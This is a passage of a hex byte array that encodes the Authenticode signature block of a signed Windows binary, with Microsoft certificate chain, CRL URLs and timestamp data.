0xCA, 0xFD, 0x33, 0x48, 0x9D, 0x59, 0x5C, 0x58, 0xAD, 0xE2, 0x3D, 0x29, 0x78, 0x28, 0x30, 0x74, 0xC8, 0x35, 0x4E, 0xF2, 0xEF, 0x96, 0x18, 0x5A, 0xDB, 0x60, 0xA8, 0xBE, 0xE7, 0xFD, 0x9A, 0xAC, 0xF9, 0xC0, 0x3D, 0xE3, 0x7D, 0x4E, 0x4A, 0xCF, 0x0B, 0x65, 0xDF, 0x21, 0xA4, 0x71, 0xE4, 0x22, 0x22, 0x83, 0xF2, 0x53, 0x60, 0x52, 0x8E, 0x51, 0x81, 0x3A, 0x35, 0xA0, 0xEA, 0xE9, 0xFC, 0xC1, 0x75, 0xE0, 0x85, 0xC2, 0x06, 0x43, 0x2C, 0x93, 0x0E, 0xD3, 0xB7, 0x62, 0xAF, 0x52, 0x27, 0x35, 0x73, 0x3F, 0xDB, 0x11, 0xA4, 0x49, 0xF9, 0xBB, 0xE3, 0xDF, 0x3F, 0x95, 0xD9, 0xF9, 0xD4, 0x93, 0xE8, 0x70, 0xD9, 0xAC, 0x5B, 0x08, 0x0C, 0x49, 0x31, 0x73, 0x5F, 0xC6, 0x53, 0x2C, 0x9B, 0x09, 0x75, 0x48, 0x44, 0x33, 0x49, 0x99, 0x77, 0x30, 0x22, 0x11, 0x81, 0xD4, 0x10, 0x56, 0x56, 0x2E, 0x24, 0xDC, 0x8C, 0xC4, 0x9B, 0xB4, 0x15, 0xA3, 0x61, 0x8A, 0xD8, 0xC4, 0xEF, 0xE5, 0xCD, 0x44, 0xFB, 0xAD, 0x74, 0xE8, 0x03, 0xA2, 0x6D, 0x69, 0xC0, 0x93, 0xA7, 0x76, 0xBF, 0x16, 0xD9, 0x79, 0x51, 0xB2, 0xA8, 0x10, 0x90, 0x01, 0xDC, 0x87, 0x36, 0x3E, 0x51, 0xAB, 0x71, 0xD9, 0xD1, 0x4E, 0x95, 0x8E, 0xE6, 0xD8, 0x5B, 0xF3, 0xA9, 0x35, 0x70, 0x87, 0x09, 0x3B, 0x8C, 0x55, 0xF0, 0xD5, 0x73, 0x35, 0x71, 0x14, 0xFE, 0x6B, 0x0E, 0x56, 0x15, 0xB3, 0x6B, 0x34, 0xBF, 0x74, 0x05, 0xEE, 0xA0, 0x3B, 0x6D, 0xF8, 0x6E, 0x31, 0x12, 0xE2, 0x47, 0xF4, 0x4B, 0xE7, 0xB7, 0x49, 0x0D, 0xEB, 0x65, 0xCB, 0xA1, 0x23, 0x84, 0xA4, 0x7B, 0x5B, 0xF1, 0xE2, 0xFD, 0x64, 0x69, 0xCE, 0xB3, 0x1F, 0x1B, 0x5B, 0x9F, 0x68, 0xF0, 0x75, 0x22, 0x78, 0x6F, 0xA8, 0x39, 0xCB, 0xF0, 0xFE, 0xE4, 0xA6, 0x67, 0xB9, 0x0B, 0x46, 0x71, 0xFE, 0x7A, 0x7E, 0x75, 0x13, 0x3E, 0x57, 0xE1, 0x56, 0x50, 0x9D, 0x02, 0x03, 0x01, 0x00, 0x01, 0xA3, 0x82, 0x01, 0xA9, 0x30, 0x82, 0x01, 0xA5, 0x30, 0x10, 0x06, 0x09, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x15, 0x01, 0x04, 0x03, 0x02, 0x01, 0x00, 0x30, 0x1D, 0x06, 0x03, 0x55, 0x1D, 0x0E, 0x04, 0x16, 0x04, 0x14, 0xC8, 0x3A, 0x9C, 0xA7, 0x4A, 0xC3, 0x23, 0xF2, 0x25, 0x7E, 0xB9, 0xDA, 0xAB, 0x29, 0x53, 0x0E, 0x54, 0x00, 0xC3, 0xA1, 0x30, 0x64, 0x06, 0x03, 0x55, 0x1D, 0x20, 0x04, 0x5D, 0x30, 0x5B, 0x30, 0x06, 0x06, 0x04, 0x55, 0x1D, 0x20, 0x00, 0x30, 0x51, 0x06, 0x0C, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x4C, 0x83, 0x7D, 0x01, 0x01, 0x30, 0x41, 0x30, 0x3F, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x02, 0x01, 0x16, 0x33, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x6D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x6B, 0x69, 0x6F, 0x70, 0x73, 0x2F, 0x44, 0x6F, 0x63, 0x73, 0x2F, 0x52, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79, 0x2E, 0x68, 0x74, 0x6D, 0x30, 0x19, 0x06, 0x09, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x14, 0x02, 0x04, 0x0C, 0x1E, 0x0A, 0x00, 0x53, 0x00, 0x75, 0x00, 0x62, 0x00, 0x43, 0x00, 0x41, 0x30, 0x0B, 0x06, 0x03, 0x55, 0x1D, 0x0F, 0x04, 0x04, 0x03, 0x02, 0x01, 0x86, 0x30, 0x0F, 0x06, 0x03, 0x55, 0x1D, 0x13, 0x01, 0x01, 0xFF, 0x04, 0x05, 0x30, 0x03, 0x01, 0x01, 0xFF, 0x30, 0x1F, 0x06, 0x03, 0x55, 0x1D, 0x23, 0x04, 0x18, 0x30, 0x16, 0x80, 0x14, 0xD5, 0xF6, 0x56, 0xCB, 0x8F, 0xE8, 0xA2, 0x5C, 0x62, 0x68, 0xD1, 0x3D, 0x94, 0x90, 0x5B, 0xD7, 0xCE, 0x9A, 0x18, 0xC4, 0x30, 0x56, 0x06, 0x03, 0x55, 0x1D, 0x1F, 0x04, 0x4F, 0x30, 0x4D, 0x30, 0x4B, 0xA0, 0x49, 0xA0, 0x47, 0x86, 0x45, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x63, 0x72, 0x6C, 0x2E, 0x6D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x6B, 0x69, 0x2F, 0x63, 0x72, 0x6C, 0x2F, 0x70, 0x72, 0x6F, 0x64, 0x75, 0x63, 0x74, 0x73, 0x2F, 0x4D, 0x69, 0x63, 0x52, 0x6F, 0x6F, 0x43, 0x65, 0x72, 0x41, 0x75, 0x74, 0x5F, 0x32, 0x30, 0x31, 0x30, 0x2D, 0x30, 0x36, 0x2D, 0x32, 0x33, 0x2E, 0x63, 0x72, 0x6C, 0x30, 0x5A, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x01, 0x01, 0x04, 0x4E, 0x30, 0x4C, 0x30, 0x4A, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x30, 0x02, 0x86, 0x3E, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x6D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x6B, 0x69, 0x2F, 0x63, 0x65, 0x72, 0x74, 0x73, 0x2F, 0x4D, 0x69, 0x63, 0x52, 0x6F, 0x6F, 0x43, 0x65, 0x72, 0x41, 0x75, 0x74, 0x5F, 0x32, 0x30, 0x31, 0x30, 0x2D, 0x30, 0x36, 0x2D, 0x32, 0x33, 0x2E, 0x63, 0x72, 0x74, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x0B, 0x05, 0x00, 0x03, 0x82, 0x02, 0x01, 0x00, 0x96, 0xB5, 0xC3, 0x3B, 0x31, 0xF2, 0x7B, 0x6B, 0xA1, 0x1F, 0x59, 0xDD, 0x74, 0x2C, 0x37, 0x64, 0xB1, 0xBC, 0xA0, 0x93, 0xF9, 0xF3, 0x33, 0x47, 0xE9, 0xF9, 0x5D, 0xF2, 0x1D, 0x89, 0xF4, 0x57, 0x9E, 0xE3, 0x3F, 0x10, 0xA3, 0x59, 0x50, 0x18, 0x05, 0x3B, 0x14, 0x29, 0x41, 0xB6, 0xA7, 0x0E, 0x5B, 0x81, 0xA2, 0xCC, 0xBD, 0x84, 0x42, 0xC1, 0xC4, 0xBE, 0xD1, 0x84, 0xC2, 0xC4, 0xBD, 0x0C, 0x8C, 0x47, 0xBC, 0xBD, 0x88, 0x86, 0xFB, 0x5A, 0x08, 0x96, 0xAE, 0x2C, 0x2F, 0xDF, 0xBF, 0x93, 0x66, 0xA3, 0x2B, 0x20, 0xCA, 0x84, 0x8A, 0x69, 0x45, 0x27, 0x3F, 0x73, 0x23, 0x32, 0x93, 0x6A, 0x23, 0xE9, 0xFF, 0xFD, 0xD9, 0x18, 0xED, 0xCE, 0xFF, 0xBD, 0x6B, 0x41, 0x73, 0x8D, 0x57, 0x9C, 0xF8, 0xB4, 0x6D, 0x49, 0x98, 0x05, 0xE6, 0xA3, 0x35, 0xA9, 0xF0, 0x7E, 0x6E, 0x86, 0xC0, 0x6B, 0xA8, 0x08, 0x67, 0x25, 0xAF, 0xC0, 0x99, 0x8C, 0xDB, 0xA7, 0x06, 0x4D, 0x40, 0x93, 0x18, 0x8B, 0xA9, 0x59, 0xE6, 0x99, 0x14, 0xB9, 0x12, 0x17, 0x81, 0x44, 0xAC, 0x57, 0xC3, 0xAE, 0x8E, 0xAE, 0x94, 0x7B, 0xCB, 0x3B, 0x8E, 0xDD, 0x7A, 0xB4, 0x71, 0x5B, 0xBA, 0x2B, 0xC3, 0xC7, 0xD0, 0x85, 0x23, 0x4B, 0x37, 0x12, 0x77, 0xA5, 0x4A, 0x2F, 0x7F, 0x1A, 0xB7, 0x63, 0xB9, 0x44, 0x59, 0xED, 0x92, 0x30, 0xCC, 0xE4, 0x7C, 0x09, 0x92, 0x12, 0x11, 0x1F, 0x52, 0xF5, 0x1E, 0x02, 0x91, 0xA4, 0xD7, 0xD7, 0xE5, 0x8F, 0x80, 0x47, 0xFF, 0x18, 0x9B, 0x7F, 0xD1, 0x9C, 0x06, 0x71, 0xDC, 0xF3, 0x76, 0x19, 0x77, 0x90, 0xD5, 0x2A, 0x0F, 0xBC, 0x6C, 0x12, 0xC4, 0xC5, 0x0C, 0x20, 0x66, 0xF5, 0x0E, 0x2F, 0x50, 0x93, 0xD8, 0xCA, 0xFB, 0x7F, 0xE5, 0x56, 0xED, 0x09, 0xD8, 0xA7, 0x53, 0xB1, 0xC7, 0x2A, 0x69, 0x78, 0xDC, 0xF0, 0x5F, 0xE7, 0x4B, 0x20, 0xB6, 0xAF, 0x63, 0xB5, 0xE1, 0xB1, 0x5C, 0x80, 0x4E, 0x9C, 0x7A, 0xA9, 0x1D, 0x4D, 0xF7, 0x28, 0x46, 0x78, 0x21, 0x06, 0x95, 0x4D, 0x32, 0xDD, 0x60, 0x42, 0xE4, 0xB6, 0x1A, 0xC4, 0xF2, 0x46, 0x36, 0xDE, 0x35, 0x73, 0x02, 0xC1, 0xB5, 0xE5, 0x5F, 0xB9, 0x2B, 0x59, 0x45, 0x7A, 0x92, 0x43, 0xD7, 0xC4, 0xE9, 0x63, 0xDD, 0x36, 0x8F, 0x76, 0xC7, 0x28, 0xCA, 0xA8, 0x44, 0x1B, 0xE8, 0x32, 0x1A, 0x66, 0xCD, 0xE5, 0x48, 0x5C, 0x4A, 0x0A, 0x60, 0x2B, 0x46, 0x92, 0x06, 0x60, 0x96, 0x98, 0xDC, 0xD9, 0x33, 0xD7, 0x21, 0x77, 0x7F, 0x88, 0x6D, 0xAC, 0x47, 0x72, 0xDA, 0xA2, 0x46, 0x6E, 0xAB, 0x64, 0x68, 0x2B, 0xD2, 0x4E, 0x98, 0xFB, 0x35, 0xCC, 0x7F, 0xEC, 0x3F, 0x13, 0x6D, 0x11, 0xE5, 0xDB, 0x77, 0xED, 0xC1, 0xC3, 0x7E, 0x1F, 0x6A, 0x4A, 0x14, 0xF8, 0xB4, 0xA7, 0x21, 0xC6, 0x71, 0x86, 0x67, 0x70, 0xCD, 0xD8, 0x19, 0xA3, 0x5D, 0x1F, 0xA0, 0x9B, 0x9A, 0x7C, 0xC5, 0x5D, 0x4D, 0x72, 0x8E, 0x74, 0x07, 0x7F, 0xA7, 0x4D, 0x00, 0xFC, 0xDD, 0x68, 0x24, 0x12, 0x77, 0x2A, 0x55, 0x75, 0x27, 0xCD, 0xA9, 0x2C, 0x1D, 0x8E, 0x7C, 0x19, 0xEE, 0x69, 0x2C, 0x9F, 0x74, 0x25, 0x33, 0x82, 0x08, 0xDB, 0x38, 0xCC, 0x7C, 0xC7, 0x4F, 0x6C, 0x3A, 0x6B, 0xC2, 0x37, 0x11, 0x78, 0x72, 0xFE, 0x55, 0x59, 0x64, 0x60, 0x33, 0x3E, 0x2E, 0xDF, 0xC4, 0x2D, 0xE7, 0x2C, 0xD7, 0xFB, 0x0A, 0x82, 0x25, 0x6F, 0xB8, 0xD7, 0x0C, 0x84, 0xA5, 0xE1, 0xC4, 0x74, 0x6E, 0x2A, 0x95, 0x32, 0x9E, 0xA0, 0xFE, 0xCD, 0xB4, 0x18, 0x8F, 0xD3, 0x3B, 0xAD, 0x32, 0xB2, 0xB1, 0x9A, 0xB8, 0x6D, 0x05, 0x43, 0xFB, 0xFF, 0x0D, 0x0F, 0x31, 0x82, 0x15, 0xF2, 0x30, 0x82, 0x15, 0xEE, 0x02, 0x01, 0x01, 0x30, 0x81, 0xA6, 0x30, 0x81, 0x8E, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x0A, 0x57, 0x61, 0x73, 0x68, 0x69, 0x6E, 0x67, 0x74, 0x6F, 0x6E, 0x31, 0x10, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x07, 0x52, 0x65, 0x64, 0x6D, 0x6F, 0x6E, 0x64, 0x31, 0x1E, 0x30, 0x1C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x15, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x38, 0x30, 0x36, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x2F, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x54, 0x68, 0x69, 0x72, 0x64, 0x20, 0x50, 0x61, 0x72, 0x74, 0x79, 0x20, 0x43, 0x6F, 0x6D, 0x70, 0x6F, 0x6E, 0x65, 0x6E, 0x74, 0x20, 0x43, 0x41, 0x20, 0x32, 0x30, 0x31, 0x34, 0x02, 0x13, 0x33, 0x00, 0x00, 0x00, 0x12, 0xB0, 0x54, 0x93, 0xEA, 0xDD, 0xCE, 0xEB, 0x4B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x30, 0x0D, 0x06, 0x09, 0x60, 0x86, 0x48, 0x01, 0x65, 0x03, 0x04, 0x02, 0x01, 0x05, 0x00, 0xA0, 0x81, 0xCF, 0x30, 0x11, 0x06, 0x0A, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x09, 0x19, 0x04, 0x31, 0x03, 0x02, 0x01, 0x02, 0x30, 0x19, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x09, 0x03, 0x31, 0x0C, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x01, 0x04, 0x30, 0x1C, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x01, 0x0B, 0x31, 0x0E, 0x30, 0x0C, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x01, 0x15, 0x30, 0x2F, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x09, 0x04, 0x31, 0x22, 0x04, 0x20, 0x80, 0x26, 0x2F, 0x2E, 0x25, 0x8D, 0x39, 0xD5, 0xF4, 0x03, 0x60, 0x00, 0x57, 0xB6, 0xF0, 0xC7, 0x88, 0x84, 0xB8, 0x97, 0x52, 0xF3, 0x86, 0xE7, 0x94, 0xEB, 0x64, 0x5D, 0xAC, 0x63, 0xFB, 0x50, 0x30, 0x50, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x01, 0x0C, 0x31, 0x42, 0x30, 0x40, 0xA0, 0x0C, 0x80, 0x0A, 0x00, 0x43, 0x00, 0x50, 0x00, 0x55, 0x00, 0x49, 0x00, 0x44, 0xA1, 0x30, 0x80, 0x2E, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x6D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x77, 0x68, 0x64, 0x63, 0x2F, 0x68, 0x63, 0x6C, 0x2F, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6C, 0x74, 0x2E, 0x6D, 0x73, 0x70, 0x78, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00, 0x04, 0x82, 0x01, 0x00, 0x3D, 0xAF, 0x78, 0xD9, 0x47, 0x96, 0xBD, 0x75, 0x3A, 0x78, 0xA2, 0x1C, 0xAD, 0xAC, 0x0E, 0xE7, 0xD4, 0x82, 0x78, 0xF8, 0xB4, 0x87, 0x4D, 0x09, 0xD3, 0x19, 0xAF, 0x2E, 0xC4, 0xF1, 0x5B, 0x95, 0x4E, 0xB2, 0x2B, 0x06, 0x73, 0x6B, 0xDA, 0x93, 0x38, 0xB0, 0xCB, 0xC9, 0x76, 0xFE, 0x2D, 0x82, 0xDD, 0x2F, 0x0C, 0x11, 0xAB, 0x74, 0xCB, 0x00, 0x34, 0x9D, 0xA5, 0x10, 0x9C, 0xD3, 0xF4, 0x60, 0x65, 0x23, 0x0F, 0x19, 0x4D, 0x63, 0x6F, 0xD1, 0x12, 0x56, 0x87, 0x4A, 0x62, 0x5E, 0x6D, 0xF0, 0x64, 0x8B, 0x84, 0x48, 0xE4, 0x5E, 0x7E, 0x20, 0x9C, 0x89, 0x82, 0x78, 0xB0, 0xBE, 0xDC, 0x31, 0x4B, 0xD5, 0xCA, 0xD4, 0x2B, 0x1C, 0x49, 0x76, 0x1C, 0xBE, 0xC6, 0x3A, 0x0B, 0x1A, 0x48, 0xF2, 0x02, 0xDA, 0x05, 0x76, 0x8B, 0xBD, 0x17, 0x71, 0x68, 0xBB, 0x57, 0xF0, 0x88, 0xE7, 0x25, 0xDB, 0xD1, 0x02, 0x94, 0xC4, 0x90, 0x7F, 0xEA, 0x50, 0x09, 0xD0, 0x89, 0x9B, 0xCE, 0x71, 0x2F, 0x4B, 0x57, 0x20, 0x49, 0x2C, 0xFF, 0xC6, 0x1E, 0x25, 0x06, 0x09, 0x37, 0x46, 0xDB, 0x7A, 0xB3, 0x79, 0x57, 0x18, 0x62, 0x2B, 0xD8, 0xC5, 0xEE, 0x9E, 0x32, 0xCD, 0x77, 0xD9, 0x3D, 0x40, 0x78, 0xF3, 0xB0, 0x45, 0x03, 0xDD, 0x43, 0x67, 0x6A, 0x94, 0x90, 0x52, 0x30, 0xBC, 0x30, 0xC0, 0x55, 0xE3, 0xCB, 0x86, 0xCB, 0x44, 0xC5, 0x67, 0x54, 0xF1, 0x36, 0xF6, 0x04, 0x5B, 0xAF, 0x81, 0xDA, 0x41, 0xD0, 0x0C, 0x4F, 0xE8, 0x63, 0x05, 0x73, 0x31, 0xBC, 0x7C, 0xD9, 0x7C, 0x41, 0x76, 0xF9, 0xAD, 0x80, 0x5E, 0xF1, 0x19, 0xE7, 0x81, 0xF2, 0x32, 0x0F, 0x30, 0x2B, 0x60, 0x89, 0xE1, 0xA9, 0x90, 0xE8, 0x93, 0x81, 0x4C, 0x92, 0xF9, 0xBF, 0xAD, 0x05, 0x67, 0x1A, 0x61, 0x63, 0xC3, 0x32, 0x07, 0xA1, 0x82, 0x13, 0x4A, 0x30, 0x82, 0x13, 0x46, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x03, 0x03, 0x01, 0x31, 0x82, 0x13, 0x36, 0x30, 0x82, 0x13, 0x32, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x07, 0x02, 0xA0, 0x82, 0x13, 0x23, 0x30, 0x82, 0x13, 0x1F, 0x02, 0x01, 0x03, 0x31, 0x0F, 0x30, 0x0D, 0x06, 0x09, 0x60, 0x86, 0x48, 0x01, 0x65, 0x03, 0x04, 0x02, 0x01, 0x05, 0x00, 0x30, 0x82, 0x01, 0x3D, 0x06, 0x0B, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x09, 0x10, 0x01, 0x04, 0xA0, 0x82, 0x01, 0x2C, 0x04, 0x82, 0x01, 0x28, 0x30, 0x82, 0x01, 0x24, 0x02, 0x01, 0x01, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x84, 0x59, 0x0A, 0x03, 0x01, 0x30, 0x31, 0x30, 0x0D, 0x06, 0x09, 0x60, 0x86, 0x48, 0x01, 0x65, 0x03, 0x04, 0x02, 0x01, 0x05, 0x00, 0x04, 0x20, 0xA0, 0xF9, 0x0F, 0x0B, 0xE5, 0x48, 0xFC, 0x8B, 0x3F, 0x85, 0x32, 0x45, 0x41, 0xA9, 0x0B, 0xE4, 0x02, 0x6A, 0x9C, 0xD4, 0x0A, 0xC5, 0xFC, 0x7D, 0x72, 0xEF, 0xB9, 0x3B, 0xA2, 0x90, 0xE3, 0x0F, 0x02, 0x06, 0x57, 0xFE, 0x7D, 0x4F, 0x61, 0x66, 0x18, 0x13, 0x32, 0x30, 0x31, 0x36, 0x31, 0x31, 0x32, 0x32, 0x31, 0x33, 0x34, 0x33, 0x34, 0x33, 0x2E, 0x34, 0x35, 0x33, 0x5A, 0x30, 0x07, 0x02, 0x01, 0x01, 0x80, 0x02, 0x01, 0xF4, 0xA0, 0x81, 0xB9, 0xA4, 0x81, 0xB6, 0x30, 0x81, 0xB3, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x0A, 0x57, 0x61, 0x73, 0x68, 0x69, 0x6E, 0x67, 0x74, 0x6F, 0x6E, 0x31, 0x10, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x07, 0x52, 0x65, 0x64, 0x6D, 0x6F, 0x6E, 0x64, 0x31, 0x1E, 0x30, 0x1C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x15, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x0D, 0x30, 0x0B, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x04, 0x4D, 0x4F, 0x50, 0x52, 0x31, 0x27, 0x30, 0x25, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x1E, 0x6E, 0x43, 0x69, 0x70, 0x68, 0x65, 0x72, 0x20, 0x44, 0x53, 0x45, 0x20, 0x45, 0x53, 0x4E, 0x3A, 0x42, 0x31, 0x42, 0x37, 0x2D, 0x46, 0x36, 0x37, 0x46, 0x2D, 0x46, 0x45, 0x43, 0x32, 0x31, 0x25, 0x30, 0x23, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x1C, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x54, 0x69, 0x6D, 0x65, 0x2D, 0x53, 0x74, 0x61, 0x6D, 0x70, 0x20, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0xA0, 0x82, 0x0E, 0xCD, 0x30, 0x82, 0x06, 0x71, 0x30, 0x82, 0x04, 0x59, 0xA0, 0x03, 0x02, 0x01, 0x02, 0x02, 0x0A, 0x61, 0x09, 0x81, 0x2A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x0B, 0x05, 0x00, 0x30, 0x81, 0x88, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x0A, 0x57, 0x61, 0x73, 0x68, 0x69, 0x6E, 0x67, 0x74, 0x6F, 0x6E, 0x31, 0x10, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x07, 0x52, 0x65, 0x64, 0x6D, 0x6F, 0x6E, 0x64, 0x31, 0x1E, 0x30, 0x1C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x15, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x32, 0x30, 0x30, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x29, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x52, 0x6F, 0x6F, 0x74, 0x20, 0x43, 0x65, 0x72, 0x74, 0x69, 0x66, 0x69, 0x63, 0x61, 0x74, 0x65, 0x20, 0x41, 0x75, 0x74, 0x68, 0x6F, 0x72, 0x69, 0x74, 0x79, 0x20, 0x32, 0x30, 0x31, 0x30, 0x30, 0x1E, 0x17, 0x0D, 0x31, 0x30, 0x30, 0x37, 0x30, 0x31, 0x32, 0x31, 0x33, 0x36, 0x35, 0x35, 0x5A, 0x17, 0x0D, 0x32, 0x35, 0x30, 0x37, 0x30, 0x31, 0x32, 0x31, 0x34, 0x36, 0x35, 0x35, 0x5A, 0x30, 0x7C, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x0A, 0x57, 0x61, 0x73, 0x68, 0x69, 0x6E, 0x67, 0x74, 0x6F, 0x6E, 0x31, 0x10, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x07, 0x52, 0x65, 0x64, 0x6D, 0x6F, 0x6E, 0x64, 0x31, 0x1E, 0x30, 0x1C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x15, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x26, 0x30, 0x24, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x1D, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x54, 0x69, 0x6D, 0x65, 0x2D, 0x53, 0x74, 0x61, 0x6D, 0x70, 0x20, 0x50, 0x43, 0x41, 0x20, 0x32, 0x30, 0x31, 0x30, 0x30, 0x82, 0x01, 0x22, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00, 0x03, 0x82, 0x01, 0x0F, 0x00, 0x30, 0x82, 0x01, 0x0A, 0x02, 0x82, 0x01, 0x01, 0x00, 0xA9, 0x1D, 0x0D, 0xBC, 0x77, 0x11, 0x8A, 0x3A, 0x20, 0xEC, 0xFC, 0x13, 0x97, 0xF5, 0xFA, 0x7F, 0x69, 0x94, 0x6B, 0x74, 0x54, 0x10, 0xD5, 0xA5, 0x0A, 0x00, 0x82, 0x85, 0xFB, 0xED, 0x7C, 0x68, 0x4B, 0x2C, 0x5F, 0xC5, 0xC3, 0xE5, 0x61, 0xC2, 0x76, 0xB7, 0x3E, 0x66, 0x2B, 0x5B, 0xF0, 0x15, 0x53, 0x27, 0x04, 0x31, 0x1F, 0x41, 0x1B, 0x1A, 0x95, 0x1D, 0xCE, 0x09, 0x13, 0x8E, 0x7C, 0x61, 0x30, 0x59, 0xB1, 0x30, 0x44, 0x0F, 0xF1, 0x60, 0x88, 0x84, 0x54, 0x43, 0x0C, 0xD7, 0x4D, 0xB8, 0x38, 0x08, 0xB3, 0x42, 0xDD, 0x93, 0xAC, 0xD6, 0x73, 0x30, 0x57, 0x26, 0x82, 0xA3, 0x45, 0x0D, 0xD0, 0xEA, 0xF5, 0x47, 0x81, 0xCD, 0xBF, 